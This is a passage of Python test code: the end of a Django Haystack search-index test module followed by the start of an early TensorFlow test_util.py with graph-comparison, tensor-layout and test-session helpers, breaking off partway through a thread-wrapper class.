[
("core.mockmodel", "1"),
("core.mockmodel", "2"),
("core.mockmodel", "3"),
("core.mockmodel", "20"),
],
)
self.sb.clear()
def test_clear(self):
self.mi.update()
self.assertGreater(self.sb.search("*")["hits"], 0)
self.mi.clear()
self.assertEqual(self.sb.search("*")["hits"], 0)
def test_reindex(self):
self.mi.reindex()
self.assertEqual(
[(res.content_type(), res.pk) for res in self.sb.search("*")["results"]],
[("core.mockmodel", "1"), ("core.mockmodel", "2"), ("core.mockmodel", "3")],
)
self.sb.clear()
def test_inheritance(self):
try:
agmi = AltGoodMockSearchIndex()
except:
self.fail()
self.assertEqual(len(agmi.fields), 5)
self.assertTrue("text" in agmi.fields)
self.assertTrue(isinstance(agmi.fields["text"], indexes.CharField))
self.assertTrue("author" in agmi.fields)
self.assertTrue(isinstance(agmi.fields["author"], indexes.CharField))
self.assertTrue("pub_date" in agmi.fields)
self.assertTrue(isinstance(agmi.fields["pub_date"], indexes.DateTimeField))
self.assertTrue("extra" in agmi.fields)
self.assertTrue(isinstance(agmi.fields["extra"], indexes.CharField))
self.assertTrue("additional" in agmi.fields)
self.assertTrue(isinstance(agmi.fields["additional"], indexes.CharField))
def test_proper_field_resolution(self):
mrofsc = MROFieldsSearchChild()
mock = MockModel()
mock.pk = 20
mock.author = "daniel%s" % mock.id
mock.pub_date = datetime.datetime(2009, 1, 31, 4, 19, 0)
mock.test_a = "This is A"
mock.test_b = "This is B"
self.assertEqual(len(mrofsc.fields), 1)
prepped_data = mrofsc.prepare(mock)
self.assertEqual(len(prepped_data), 4)
self.assertEqual(prepped_data["text"], "This is A")
def test_load_all_queryset(self):
self.assertEqual([obj.id for obj in self.cmi.load_all_queryset()], [2, 3])
def test_nullable(self):
mock = MockModel()
mock.pk = 20
mock.author = None
mock.pub_date = datetime.datetime(2009, 1, 31, 4, 19, 0)
prepared_data = self.cnmi.prepare(mock)
self.assertEqual(len(prepared_data), 6)
self.assertEqual(
sorted(prepared_data.keys()),
["author", "author_exact", "django_ct", "django_id", "id", "text"],
)
prepared_data = self.cnmi.full_prepare(mock)
self.assertEqual(len(prepared_data), 4)
self.assertEqual(
sorted(prepared_data.keys()), ["django_ct", "django_id", "id", "text"]
)
def test_custom_facet_fields(self):
mock = MockModel()
mock.pk = 20
mock.author = "daniel"
mock.pub_date = datetime.datetime(2009, 1, 31, 4, 19, 0)
prepared_data = self.gfmsi.prepare(mock)
self.assertEqual(len(prepared_data), 8)
self.assertEqual(
sorted(prepared_data.keys()),
[
"author",
"author_foo",
"django_ct",
"django_id",
"id",
"pub_date",
"pub_date_exact",
"text",
],
)
prepared_data = self.gfmsi.full_prepare(mock)
self.assertEqual(len(prepared_data), 8)
self.assertEqual(
sorted(prepared_data.keys()),
[
"author",
"author_foo",
"django_ct",
"django_id",
"id",
"pub_date",
"pub_date_exact",
"text",
],
)
self.assertEqual(prepared_data["author_foo"], "Hi, I'm daniel")
self.assertEqual(prepared_data["pub_date_exact"], "2010-10-26T01:54:32")
class BasicModelSearchIndex(indexes.ModelSearchIndex, indexes.Indexable):
class Meta:
model = MockModel
class FieldsModelSearchIndex(indexes.ModelSearchIndex, indexes.Indexable):
class Meta:
model = MockModel
fields = ["author", "pub_date"]
class ExcludesModelSearchIndex(indexes.ModelSearchIndex, indexes.Indexable):
class Meta:
model = MockModel
excludes = ["author", "foo"]
class FieldsWithOverrideModelSearchIndex(indexes.ModelSearchIndex, indexes.Indexable):
foo = indexes.IntegerField(model_attr="foo")
class Meta:
model = MockModel
fields = ["author", "foo"]
def get_index_fieldname(self, f):
if f.name == "author":
return "author_bar"
else:
return f.name
class YetAnotherBasicModelSearchIndex(indexes.ModelSearchIndex, indexes.Indexable):
text = indexes.CharField(document=True)
class Meta:
model = AThirdMockModel
class PolymorphicModelSearchIndex(indexes.SearchIndex, indexes.Indexable):
text = indexes.CharField(document=True)
author = indexes.CharField(model_attr="author")
pub_date = indexes.DateTimeField(model_attr="pub_date")
average_delay = indexes.FloatField(null=True)
def get_model(self):
return AnotherMockModel
def prepare(self, obj):
self.prepared_data = super(PolymorphicModelSearchIndex, self).prepare(obj)
if isinstance(obj, AThirdMockModel):
self.prepared_data["average_delay"] = obj.average_delay
return self.prepared_data
def index_queryset(self, using=None):
return self.get_model().objects.all()
class GhettoAFifthMockModelSearchIndex(indexes.SearchIndex, indexes.Indexable):
text = indexes.CharField(document=True)
def get_model(self):
return AFifthMockModel
def index_queryset(self, using=None):
# Index everything,
return self.get_model().objects.complete_set()
def read_queryset(self, using=None):
return self.get_model().objects.all()
class ReadQuerySetTestSearchIndex(indexes.SearchIndex, indexes.Indexable):
author = indexes.CharField(model_attr="author", document=True)
def get_model(self):
return AFifthMockModel
def read_queryset(self, using=None):
return self.get_model().objects.complete_set()
class TextReadQuerySetTestSearchIndex(indexes.SearchIndex, indexes.Indexable):
text = indexes.CharField(model_attr="author", document=True)
def get_model(self):
return AFifthMockModel
def read_queryset(self, using=None):
return self.get_model().objects.complete_set()
class ModelWithManyToManyFieldModelSearchIndex(indexes.ModelSearchIndex):
def get_model(self):
return ManyToManyLeftSideModel
class ModelSearchIndexTestCase(TestCase):
def setUp(self):
super(ModelSearchIndexTestCase, self).setUp()
self.sb = connections["default"].get_backend()
self.bmsi = BasicModelSearchIndex()
self.fmsi = FieldsModelSearchIndex()
self.emsi = ExcludesModelSearchIndex()
self.fwomsi = FieldsWithOverrideModelSearchIndex()
self.yabmsi = YetAnotherBasicModelSearchIndex()
self.m2mmsi = ModelWithManyToManyFieldModelSearchIndex()
def test_basic(self):
self.assertEqual(len(self.bmsi.fields), 4)
self.assertTrue("foo" in self.bmsi.fields)
self.assertTrue(isinstance(self.bmsi.fields["foo"], indexes.CharField))
self.assertEqual(self.bmsi.fields["foo"].null, False)
self.assertEqual(self.bmsi.fields["foo"].index_fieldname, "foo")
self.assertTrue("author" in self.bmsi.fields)
self.assertTrue(isinstance(self.bmsi.fields["author"], indexes.CharField))
self.assertEqual(self.bmsi.fields["author"].null, False)
self.assertTrue("pub_date" in self.bmsi.fields)
self.assertTrue(isinstance(self.bmsi.fields["pub_date"], indexes.DateTimeField))
self.assertTrue(
isinstance(self.bmsi.fields["pub_date"].default, datetime.datetime)
)
self.assertTrue("text" in self.bmsi.fields)
self.assertTrue(isinstance(self.bmsi.fields["text"], indexes.CharField))
self.assertEqual(self.bmsi.fields["text"].document, True)
self.assertEqual(self.bmsi.fields["text"].use_template, True)
def test_fields(self):
self.assertEqual(len(self.fmsi.fields), 3)
self.assertTrue("author" in self.fmsi.fields)
self.assertTrue(isinstance(self.fmsi.fields["author"], indexes.CharField))
self.assertTrue("pub_date" in self.fmsi.fields)
self.assertTrue(isinstance(self.fmsi.fields["pub_date"], indexes.DateTimeField))
self.assertTrue("text" in self.fmsi.fields)
self.assertTrue(isinstance(self.fmsi.fields["text"], indexes.CharField))
def test_excludes(self):
self.assertEqual(len(self.emsi.fields), 2)
self.assertTrue("pub_date" in self.emsi.fields)
self.assertTrue(isinstance(self.emsi.fields["pub_date"], indexes.DateTimeField))
self.assertTrue("text" in self.emsi.fields)
self.assertTrue(isinstance(self.emsi.fields["text"], indexes.CharField))
self.assertNotIn("related_models", self.m2mmsi.fields)
def test_fields_with_override(self):
self.assertEqual(len(self.fwomsi.fields), 3)
self.assertTrue("author" in self.fwomsi.fields)
self.assertTrue(isinstance(self.fwomsi.fields["author"], indexes.CharField))
self.assertTrue("foo" in self.fwomsi.fields)
self.assertTrue(isinstance(self.fwomsi.fields["foo"], indexes.IntegerField))
self.assertTrue("text" in self.fwomsi.fields)
self.assertTrue(isinstance(self.fwomsi.fields["text"], indexes.CharField))
def test_overriding_field_name_with_get_index_fieldname(self):
self.assertTrue(self.fwomsi.fields["foo"].index_fieldname, "foo")
self.assertTrue(self.fwomsi.fields["author"].index_fieldname, "author_bar")
def test_float_integer_fields(self):
self.assertEqual(len(self.yabmsi.fields), 5)
self.assertEqual(
sorted(self.yabmsi.fields.keys()),
["author", "average_delay", "pub_date", "text", "view_count"],
)
self.assertTrue("author" in self.yabmsi.fields)
self.assertTrue(isinstance(self.yabmsi.fields["author"], indexes.CharField))
self.assertEqual(self.yabmsi.fields["author"].null, False)
self.assertTrue("pub_date" in self.yabmsi.fields)
self.assertTrue(
isinstance(self.yabmsi.fields["pub_date"], indexes.DateTimeField)
)
self.assertTrue(
isinstance(self.yabmsi.fields["pub_date"].default, datetime.datetime)
)
self.assertTrue("text" in self.yabmsi.fields)
self.assertTrue(isinstance(self.yabmsi.fields["text"], indexes.CharField))
self.assertEqual(self.yabmsi.fields["text"].document, True)
self.assertEqual(self.yabmsi.fields["text"].use_template, False)
self.assertTrue("view_count" in self.yabmsi.fields)
self.assertTrue(
isinstance(self.yabmsi.fields["view_count"], indexes.IntegerField)
)
self.assertEqual(self.yabmsi.fields["view_count"].null, False)
self.assertEqual(self.yabmsi.fields["view_count"].index_fieldname, "view_count")
self.assertTrue("average_delay" in self.yabmsi.fields)
self.assertTrue(
isinstance(self.yabmsi.fields["average_delay"], indexes.FloatField)
)
self.assertEqual(self.yabmsi.fields["average_delay"].null, False)
self.assertEqual(
self.yabmsi.fields["average_delay"].index_fieldname, "average_delay"
)
class ModelWithManyToManyFieldAndAttributeLookupSearchIndexTestCase(TestCase):
def test_full_prepare(self):
index = ModelWithManyToManyFieldAndAttributeLookupSearchIndex()
left_model = ManyToManyLeftSideModel.objects.create()
right_model_1 = ManyToManyRightSideModel.objects.create(name="Right side 1")
right_model_2 = ManyToManyRightSideModel.objects.create()
left_model.related_models.add(right_model_1)
left_model.related_models.add(right_model_2)
result = index.full_prepare(left_model)
self.assertDictEqual(
result,
{
"django_ct": "core.manytomanyleftsidemodel",
"django_id": "1",
"text": None,
"id": "core.manytomanyleftsidemodel.1",
"related_models": ["Right side 1", "Default name"],
},
)
class PolymorphicModelTestCase(TestCase):
def test_prepare_with_polymorphic(self):
index = PolymorphicModelSearchIndex()
parent_model = AnotherMockModel()
parent_model.author = "Paul"
parent_model.pub_date = datetime.datetime(2018, 5, 23, 13, 57)
parent_model.save()
child_model = AThirdMockModel()
child_model.author = "Paula"
child_model.pub_date = datetime.datetime(2018, 5, 23, 13, 58)
child_model.average_delay = 0.5
child_model.save()
prepared_data = index.prepare(parent_model)
self.assertEqual(len(prepared_data), 7)
self.assertEqual(
sorted(prepared_data.keys()),
[
"author",
"average_delay",
"django_ct",
"django_id",
"id",
"pub_date",
"text",
],
)
self.assertEqual(prepared_data["django_ct"], "core.anothermockmodel")
self.assertEqual(prepared_data["average_delay"], None)
prepared_data = index.prepare(child_model)
self.assertEqual(len(prepared_data), 7)
self.assertEqual(
sorted(prepared_data.keys()),
[
"author",
"average_delay",
"django_ct",
"django_id",
"id",
"pub_date",
"text",
],
)
self.assertEqual(prepared_data["django_ct"], "core.anothermockmodel")
self.assertEqual(prepared_data["average_delay"], 0.5)
|
test_util.py
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
# pylint: disable=invalid-name
"""Test utils for tensorflow."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import contextlib
import math
import random
import re
import tempfile
import threading
import numpy as np
import six
_portpicker_import_error = None
try:
import portpicker # pylint: disable=g-import-not-at-top
except ImportError as _error:
_portpicker_import_error = _error
portpicker = None
# pylint: disable=g-import-not-at-top
from google.protobuf import descriptor_pool
from google.protobuf import text_format
from tensorflow.core.framework import graph_pb2
from tensorflow.core.protobuf import config_pb2
from tensorflow.core.protobuf import rewriter_config_pb2
from tensorflow.python import pywrap_tensorflow
from tensorflow.python.client import device_lib
from tensorflow.python.client import session
from tensorflow.python.eager import context
from tensorflow.python.framework import device as pydev
from tensorflow.python.framework import errors
from tensorflow.python.framework import ops
from tensorflow.python.framework import random_seed
from tensorflow.python.framework import versions
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.platform import googletest
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.training import server_lib
from tensorflow.python.util import compat
from tensorflow.python.util.protobuf import compare
def gpu_device_name():
"""Returns the name of a GPU device if available or the empty string."""
for x in device_lib.list_local_devices():
if x.device_type == "GPU" or x.device_type == "SYCL":
return compat.as_str(x.name)
return ""
def assert_ops_in_graph(expected_ops, graph):
"""Assert all expected operations are found.
Args:
expected_ops: `dict<string, string>` of op name to op type.
graph: Graph to check.
Returns:
`dict<string, node>` of node name to node.
Raises:
ValueError: If the expected ops are not present in the graph.
"""
actual_ops = {}
gd = graph.as_graph_def()
for node in gd.node:
if node.name in expected_ops:
if expected_ops[node.name] != node.op:
raise ValueError("Expected op for node %s is different. %s vs %s" %
(node.name, expected_ops[node.name], node.op))
actual_ops[node.name] = node
if set(expected_ops.keys()) != set(actual_ops.keys()):
raise ValueError("Not all expected ops are present. Expected %s, found %s" %
(expected_ops.keys(), actual_ops.keys()))
return actual_ops
def assert_equal_graph_def(actual, expected, checkpoint_v2=False):
"""Asserts that two `GraphDef`s are (mostly) the same.
Compares two `GraphDef` protos for equality, ignoring versions and ordering of
nodes, attrs, and control inputs. Node names are used to match up nodes
between the graphs, so the naming of nodes must be consistent.
Args:
actual: The `GraphDef` we have.
expected: The `GraphDef` we expected.
checkpoint_v2: boolean determining whether to ignore randomized attribute
values that appear in V2 checkpoints.
Raises:
AssertionError: If the `GraphDef`s do not match.
TypeError: If either argument is not a `GraphDef`.
"""
if not isinstance(actual, graph_pb2.GraphDef):
raise TypeError("Expected tf.GraphDef for actual, got %s" %
type(actual).__name__)
if not isinstance(expected, graph_pb2.GraphDef):
raise TypeError("Expected tf.GraphDef for expected, got %s" %
type(expected).__name__)
if checkpoint_v2:
_strip_checkpoint_v2_randomized(actual)
_strip_checkpoint_v2_randomized(expected)
diff = pywrap_tensorflow.EqualGraphDefWrapper(actual.SerializeToString(),
expected.SerializeToString())
if diff:
raise AssertionError(compat.as_str(diff))
def assert_meta_graph_protos_equal(tester, a, b):
"""Compares MetaGraphDefs `a` and `b` in unit test class `tester`."""
# Carefully check the collection_defs
tester.assertEqual(set(a.collection_def), set(b.collection_def))
collection_keys = a.collection_def.keys()
for k in collection_keys:
a_value = a.collection_def[k]
b_value = b.collection_def[k]
proto_type = ops.get_collection_proto_type(k)
if proto_type:
a_proto = proto_type()
b_proto = proto_type()
# Number of entries in the collections is the same
tester.assertEqual(len(a_value.bytes_list.value),
len(b_value.bytes_list.value))
for (a_value_item, b_value_item) in zip(
a_value.bytes_list.value,
b_value.bytes_list.value):
a_proto.ParseFromString(a_value_item)
b_proto.ParseFromString(b_value_item)
tester.assertProtoEquals(a_proto, b_proto)
else:
tester.assertEquals(a_value, b_value)
# Compared the fields directly, remove their raw values from the
# proto comparison below.
a.ClearField("collection_def")
b.ClearField("collection_def")
tester.assertProtoEquals(a, b)
# Matches attributes named via _SHARDED_SUFFIX in
# tensorflow/python/training/saver.py
_SHARDED_SAVE_OP_PATTERN = "_temp_[0-9a-z]{32}/part"
def _strip_checkpoint_v2_randomized(graph_def):
for node in graph_def.node:
delete_keys = []
for attr_key in node.attr:
attr_tensor_value = node.attr[attr_key].tensor
if attr_tensor_value and len(attr_tensor_value.string_val) == 1:
attr_tensor_string_value = attr_tensor_value.string_val[0]
if (attr_tensor_string_value and
re.match(_SHARDED_SAVE_OP_PATTERN, attr_tensor_string_value)):
delete_keys.append(attr_key)
for attr_key in delete_keys:
del node.attr[attr_key]
def IsGoogleCudaEnabled():
return pywrap_tensorflow.IsGoogleCudaEnabled()
def CudaSupportsHalfMatMulAndConv():
return pywrap_tensorflow.CudaSupportsHalfMatMulAndConv()
def NHWCToNCHW(input_tensor):
"""Converts the input from the NHWC format to NCHW.
Args:
input_tensor: a 4- or 5-D tensor, or an array representing shape
Returns:
converted tensor or shape array
"""
# tensor dim -> new axis order
new_axes = {
4: [0, 3, 1, 2],
5: [0, 4, 1, 2, 3]
}
if isinstance(input_tensor, ops.Tensor):
ndims = input_tensor.shape.ndims
return array_ops.transpose(input_tensor, new_axes[ndims])
else:
ndims = len(input_tensor)
return [input_tensor[a] for a in new_axes[ndims]]
def NHWCToNCHW_VECT_C(input_shape_or_tensor):
"""Transforms the input from the NHWC layout to NCHW_VECT_C layout.
Note: Does not include quantization or type conversion steps, which should
be applied afterwards.
Args:
input_shape_or_tensor: a 4- or 5-D tensor, or an array representing shape
Returns:
tensor or shape array transformed into NCHW_VECT_C
Raises:
ValueError: if last dimension of `input_shape_or_tensor` is not evenly
divisible by 4.
"""
permutations = {5: [0, 3, 1, 2, 4], 6: [0, 4, 1, 2, 3, 5]}
is_tensor = isinstance(input_shape_or_tensor, ops.Tensor)
temp_shape = (input_shape_or_tensor.shape.as_list()
if is_tensor else input_shape_or_tensor)
if temp_shape[-1] % 4 != 0:
raise ValueError(
"Last dimension of input must be evenly divisible by 4 to convert to "
"NCHW_VECT_C.")
temp_shape[-1] //= 4
temp_shape.append(4)
permutation = permutations[len(temp_shape)]
if is_tensor:
t = array_ops.reshape(input_shape_or_tensor, temp_shape)
return array_ops.transpose(t, permutation)
else:
return [temp_shape[a] for a in permutation]
def NCHW_VECT_CToNHWC(input_shape_or_tensor):
"""Transforms the input from the NCHW_VECT_C layout to NHWC layout.
Note: Does not include de-quantization or type conversion steps, which should
be applied beforehand.
Args:
input_shape_or_tensor: a 5- or 6-D tensor, or an array representing shape
Returns:
tensor or shape array transformed into NHWC
Raises:
ValueError: if last dimension of `input_shape_or_tensor` is not 4.
"""
permutations = {5: [0, 2, 3, 1, 4], 6: [0, 2, 3, 4, 1, 5]}
is_tensor = isinstance(input_shape_or_tensor, ops.Tensor)
input_shape = (input_shape_or_tensor.shape.as_list()
if is_tensor else input_shape_or_tensor)
if input_shape[-1] != 4:
raise ValueError("Last dimension of NCHW_VECT_C must be 4.")
permutation = permutations[len(input_shape)]
nhwc_shape = [input_shape[a] for a in permutation[:-1]]
nhwc_shape[-1] *= input_shape[-1]
if is_tensor:
t = array_ops.transpose(input_shape_or_tensor, permutation)
return array_ops.reshape(t, nhwc_shape)
else:
return nhwc_shape
def NCHWToNHWC(input_tensor):
"""Converts the input from the NCHW format to NHWC.
Args:
input_tensor: a 4- or 5-D tensor, or an array representing shape
Returns:
converted tensor or shape array
"""
# tensor dim -> new axis order
new_axes = {
4: [0, 2, 3, 1],
5: [0, 2, 3, 4, 1]
}
if isinstance(input_tensor, ops.Tensor):
ndims = input_tensor.shape.ndims
return array_ops.transpose(input_tensor, new_axes[ndims])
else:
ndims = len(input_tensor)
return [input_tensor[a] for a in new_axes[ndims]]
# TODO(skyewm): remove this eventually
# pylint: disable=protected-access
def _use_c_api_wrapper(fn, use_c_api, *args, **kwargs):
prev_value = ops._USE_C_API
ops._USE_C_API = use_c_api
try:
with ops.Graph().as_default():
fn(*args, **kwargs)
finally:
ops._USE_C_API = prev_value
# pylint: disable=protected-access
# TODO(skyewm): remove this eventually
def disable_c_api(fn):
"""Decorator for disabling the C API on a test.
Note this disables the C API after running the test class's setup/teardown
methods.
Args:
fn: the function to be wrapped
Returns:
The wrapped function
"""
return lambda *args, **kwargs: _use_c_api_wrapper(fn, False, *args, **kwargs)
# TODO(skyewm): remove this eventually
def enable_c_api(fn):
"""Decorator for enabling the C API on a test.
Note this enables the C API after running the test class's setup/teardown
methods.
Args:
fn: the function to be wrapped
Returns:
The wrapped function
"""
return lambda *args, **kwargs: _use_c_api_wrapper(fn, True, *args, **kwargs)
def run_in_graph_and_eager_modes(__unused__=None, graph=None, config=None,
use_gpu=False, force_gpu=False,
reset_test=True):
"""Runs the test in both graph and eager modes.
Args:
__unused__: Prevents sliently skipping tests.
graph: Optional graph to use during the returned session.
config: An optional config_pb2.ConfigProto to use to configure the
session.
use_gpu: If True, attempt to run as many ops as possible on GPU.
force_gpu: If True, pin all ops to `/device:GPU:0`.
reset_test: If True, tearDown and SetUp the test case again.
Returns:
Returns a decorator that will run the decorated test function
using both a graph and using eager execution.
"""
assert not __unused__, "Add () after run_in_graph_and_eager_modes."
def decorator(f):
"""Test method decorator."""
def decorated(self, **kwargs):
"""Decorated the test method."""
with context.graph_mode():
with self.test_session(graph, config, use_gpu, force_gpu):
f(self, **kwargs)
if reset_test:
# This decorator runs the wrapped test twice.
# Reset the test environment between runs.
self.tearDown()
self.setUp()
def run_eager_mode():
if force_gpu:
gpu_name = gpu_device_name()
if not gpu_name:
gpu_name = "/device:GPU:0"
with context.device(gpu_name):
f(self)
elif use_gpu:
# TODO(xpan): Support softplacement and gpu by default when available.
f(self, **kwargs)
else:
with context.device("/device:CPU:0"):
f(self, **kwargs)
eager_graph = graph or ops.Graph()
with context.eager_mode():
with eager_graph.as_default():
run_eager_mode()
return decorated
return decorator
def is_gpu_available(cuda_only=False, min_cuda_compute_capability=None):
"""Returns whether TensorFlow can access a GPU.
Args:
cuda_only: limit the search to CUDA gpus.
min_cuda_compute_capability: a (major,minor) pair that indicates the minimum
CUDA compute capability required, or None if no requirement.
Returns:
True iff a gpu device of the requested kind is available.
"""
def compute_capability_from_device_desc(device_desc):
# TODO(jingyue): The device description generator has to be in sync with
# this file. Another option is to put compute capability in
# DeviceAttributes, but I avoided that to keep DeviceAttributes
# target-independent. Reconsider this option when we have more things like
# this to keep in sync.
# LINT.IfChange
match = re.search(r"compute capability: (\d+)\.(\d+)", device_desc)
# LINT.ThenChange(//tensorflow/core/\
# common_runtime/gpu/gpu_device.cc)
if not match:
return 0, 0
return int(match.group(1)), int(match.group(2))
for local_device in device_lib.list_local_devices():
if local_device.device_type == "GPU":
if (min_cuda_compute_capability is None or
compute_capability_from_device_desc(local_device.physical_device_desc)
>= min_cuda_compute_capability):
return True
if local_device.device_type == "SYCL" and not cuda_only:
return True
return False
@contextlib.contextmanager
def device(use_gpu):
"""Uses gpu when requested and available."""
if use_gpu and is_gpu_available():
dev = "/device:GPU:0"
else:
dev = "/device:CPU:0"
with ops.device(dev):
yield
class TensorFlowTestCase(googletest.TestCase):
"""Base class for tests that need to test TensorFlow.
"""
def __init__(self, methodName="runTest"): # pylint: disable=invalid-name
super(TensorFlowTestCase, self).__init__(methodName)
self._threads = []
self._tempdir = None
self._cached_session = None
def setUp(self):
self._ClearCachedSession()
random.seed(random_seed.DEFAULT_GRAPH_SEED)
np.random.seed(random_seed.DEFAULT_GRAPH_SEED)
# Note: The following line is necessary because some test methods may error
# out from within nested graph contexts (e.g., via assertRaises and
# assertRaisesRegexp), which may leave ops._default_graph_stack non-empty
# under certain versions of Python. That would cause
# ops.reset_default_graph() to throw an exception if the stack were not
# cleared first.
ops._default_graph_stack.reset() # pylint: disable=protected-access
ops.reset_default_graph()
ops.get_default_graph().seed = random_seed.DEFAULT_GRAPH_SEED
def tearDown(self):
for thread in self._threads:
self.assertFalse(thread.is_alive(), "A checkedThread did not terminate")
self._ClearCachedSession()
def _ClearCachedSession(self):
if self._cached_session is not None:
self._cached_session.close()
self._cached_session = None
def get_temp_dir(self):
"""Returns a unique temporary directory for the test to use.
If you call this method multiple times during in a test, it will return the
same folder. However, across different runs the directories will be
different. This will ensure that across different runs tests will not be
able to pollute each others environment.
If you need multiple unique directories within a single test, you should
use tempfile.mkdtemp as follows:
tempfile.mkdtemp(dir=self.get_temp_dir()):
Returns:
string, the path to the unique temporary directory created for this test.
"""
if not self._tempdir:
self._tempdir = tempfile.mkdtemp(dir=googletest.GetTempDir())
return self._tempdir
def _AssertProtoEquals(self, a, b):
"""Asserts that a and b are the same proto.
Uses ProtoEq() first, as it returns correct results
for floating point attributes, and then use assertProtoEqual()
in case of failure as it provides good error messages.
Args:
a: a proto.
b: another proto.
"""
if not compare.ProtoEq(a, b):
compare.assertProtoEqual(self, a, b, normalize_numbers=True)
def assertProtoEquals(self, expected_message_maybe_ascii, message):
"""Asserts that message is same as parsed expected_message_ascii.
Creates another prototype of message, reads the ascii message into it and
then compares them using self._AssertProtoEqual().
Args:
expected_message_maybe_ascii: proto message in original or ascii form.
message: the message to validate.
"""
if isinstance(expected_message_maybe_ascii, type(message)):
expected_message = expected_message_maybe_ascii
self._AssertProtoEquals(expected_message, message)
elif isinstance(expected_message_maybe_ascii, str):
expected_message = type(message)()
text_format.Merge(expected_message_maybe_ascii, expected_message,
descriptor_pool=descriptor_pool.Default())
self._AssertProtoEquals(expected_message, message)
else:
assert False, ("Can't compare protos of type %s and %s" %
(type(expected_message_maybe_ascii), type(message)))
def assertProtoEqualsVersion(
self,
expected,
actual,
producer=versions.GRAPH_DEF_VERSION,
min_consumer=versions.GRAPH_DEF_VERSION_MIN_CONSUMER):
expected = "versions { producer: %d min_consumer: %d };\n%s" % (
producer, min_consumer, expected)
self.assertProtoEquals(expected, actual)
def assertStartsWith(self, actual, expected_start, msg=None):
"""Assert that actual.startswith(expected_start) is True.
Args:
actual: str
expected_start: str
msg: Optional message to report on failure.
"""
if not actual.startswith(expected_start):
fail_msg = "%r does not start with %r" % (actual, expected_start)
fail_msg += " : %r" % (msg) if msg else ""
self.fail(fail_msg)
def _eval_helper(self, tensors):
if isinstance(tensors, ops.EagerTensor):
return tensors.numpy()
if isinstance(tensors, resource_variable_ops.ResourceVariable):
return tensors.read_value().numpy()
if isinstance(tensors, tuple):
return tuple([self._eval_helper(t) for t in tensors])
elif isinstance(tensors, list):
return [self._eval_helper(t) for t in tensors]
elif isinstance(tensors, dict):
assert not tensors, "Only support empty dict now."
return dict()
else:
raise ValueError("Unsupported type.")
def evaluate(self, tensors):
"""Evaluates tensors and returns numpy values.
Args:
tensors: A Tensor or a nested list/tuple of Tensors.
Returns:
tensors numpy values.
"""
if context.in_eager_mode():
return self._eval_helper(tensors)
else:
sess = ops.get_default_session()
return sess.run(tensors)
# pylint: disable=g-doc-return-or-yield
@contextlib.contextmanager
def test_session(self,
graph=None,
config=None,
use_gpu=False,
force_gpu=False):
"""Returns a TensorFlow Session for use in executing tests.
This method should be used for all functional tests.
This method behaves different than session.Session: for performance reasons
`test_session` will by default (if `graph` is None) reuse the same session
across tests. This means you may want to either call the function
`reset_default_graph()` before tests, or if creating an explicit new graph,
pass it here (simply setting it with `as_default()` won't do it), which will
trigger the creation of a new session.
Use the `use_gpu` and `force_gpu` options to control where ops are run. If
`force_gpu` is True, all ops are pinned to `/device:GPU:0`. Otherwise, if `use_gpu`
is True, TensorFlow tries to run as many ops on the GPU as possible. If both
`force_gpu and `use_gpu` are False, all ops are pinned to the CPU.
Example:
```python
class MyOperatorTest(test_util.TensorFlowTestCase):
def testMyOperator(self):
with self.test_session(use_gpu=True):
valid_input = [1.0, 2.0, 3.0, 4.0, 5.0]
result = MyOperator(valid_input).eval()
self.assertEqual(result, [1.0, 2.0, 3.0, 5.0, 8.0]
invalid_input = [-1.0, 2.0, 7.0]
with self.assertRaisesOpError("negative input not supported"):
MyOperator(invalid_input).eval()
```
Args:
graph: Optional graph to use during the returned session.
config: An optional config_pb2.ConfigProto to use to configure the
session.
use_gpu: If True, attempt to run as many ops as possible on GPU.
force_gpu: If True, pin all ops to `/device:GPU:0`.
Returns:
A Session object that should be used as a context manager to surround
the graph building and execution code in a test case.
"""
if self.id().endswith(".test_session"):
self.skipTest("Not a test.")
def prepare_config(config):
"""Returns a config for sessions.
Args:
config: An optional config_pb2.ConfigProto to use to configure the
session.
Returns:
A config_pb2.ConfigProto object.
"""
if config is None:
config = config_pb2.ConfigProto()
config.allow_soft_placement = not force_gpu
config.gpu_options.per_process_gpu_memory_fraction = 0.3
elif force_gpu and config.allow_soft_placement:
config = config_pb2.ConfigProto().CopyFrom(config)
config.allow_soft_placement = False
# Don't perform optimizations for tests so we don't inadvertently run
# gpu ops on cpu
config.graph_options.optimizer_options.opt_level = -1
config.graph_options.rewrite_options.constant_folding = (
rewriter_config_pb2.RewriterConfig.OFF)
config.graph_options.rewrite_options.arithmetic_optimization = (
rewriter_config_pb2.RewriterConfig.OFF)
return config
if graph is None:
if self._cached_session is None:
self._cached_session = session.Session(
graph=None, config=prepare_config(config))
sess = self._cached_session
with sess.graph.as_default(), sess.as_default():
if force_gpu:
# Use the name of an actual device if one is detected, or '/device:GPU:0'
# otherwise
gpu_name = gpu_device_name()
if not gpu_name:
gpu_name = "/device:GPU:0"
with sess.graph.device(gpu_name):
yield sess
elif use_gpu:
yield sess
else:
with sess.graph.device("/cpu:0"):
yield sess
else:
with session.Session(graph=graph, config=prepare_config(config)) as sess:
if force_gpu:
# Use the name of an actual device if one is detected, or '/device:GPU:0'
# otherwise
gpu_name = gpu_device_name()
if not gpu_name:
gpu_name = "/device:GPU:0"
with sess.graph.device(gpu_name):
yield sess
elif use_gpu:
yield sess
else:
with sess.graph.device("/cpu:0"):
yield sess
# pylint: enable=g-doc-return-or-yield
class _CheckedThread(object):
"""A wrapper class for Thread that asserts successful completion.
This class should be created using the TensorFlowTestCase.checkedThread()
method.
"""
def __init__(self, testcase, target, args=None, kwargs=None):
"""Constructs a new instance of _CheckedThread.
Args:
testcase: The TensorFlowTestCase for which this thread is being created.
target: A callable object representing the code to be executed in the
thread.
args: A tuple of positional arguments that will be passed to target.
kwargs: A dictionary of keyword arguments that will be passed to target.
"""
self._testcase = testcase
self._target = target
self._args = () if args is None else args
self._kwargs = {} if kwargs is None else kwargs
self._thread = threading.Thread(target=self._protected_run)
self._exception = None
def _protected_run(self):
"""Target for the wrapper thread. Sets self._exception on failure."""
try:
self._target(*self._args, **self._kwargs)
